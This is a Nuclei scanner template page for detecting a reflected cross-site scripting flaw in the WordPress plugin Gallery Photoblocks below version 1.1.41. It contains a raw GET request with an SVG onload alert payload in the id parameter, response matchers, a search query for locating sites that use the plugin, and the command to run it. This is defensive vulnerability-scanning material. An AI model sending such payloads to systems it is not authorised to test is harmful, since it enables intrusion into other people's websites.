Skip to content

Gallery Photoblocks < 1.1.41 - Cross-Site Scripting

ID: photoblocks-grid-gallery-xss

Severity: medium

Author: r3Y3r53

Tags: wordpress,wpscan,photoblocks,wp-plugin,wp,xss

Reflected Cross-Site Scripting (XSS) is a type of web vulnerability where an attacker injects malicious scripts into a website, and the injected code gets reflected back to the user’s browser, executing the script in the context of the vulnerable website.

id: photoblocks-grid-gallery-xss
info:
name: Gallery Photoblocks < 1.1.41 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Reflected Cross-Site Scripting (XSS) is a type of web vulnerability where an attacker injects malicious scripts into a website, and the injected code gets reflected back to the user's browser, executing the script in the context of the vulnerable website.
remediation: Fixed in version 1.1.41
reference:
- https://plugins.trac.wordpress.org/changeset/2117972
- https://wpscan.com/vulnerability/5c57e78a-97b9-4e23-8935-e4c9d806c89d
- https://wordpress.org/plugins/photoblocks-grid-gallery/
classification:
cpe: cpe:2.3:a:wpchill:gallery_photoblocks:*:*:*:*:wordpress:*:*:*
metadata:
verified: true
max-request: 1
vendor: wpchill
product: gallery_photoblocks
publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/"
tags: wordpress,wpscan,photoblocks,wp-plugin,wp,xss
http:
- raw:
- |
GET /wp-content/plugins/photoblocks-grid-gallery/admin/partials/photoblocks-edit.php?id=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<svg/onload=alert(document.domain)>")'
- 'contains(body, "PhotoBlocks")'
condition: and
# digest: 4a0a00473045022100d201edc6dd6dd9def3db706ccc28aa358e8e615959124fe2086057d11a5dfdf402202157682b9486c8982dd2ea0bf3286572384d04319039c34f1ebf01eff54b1f01:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml"

View on Github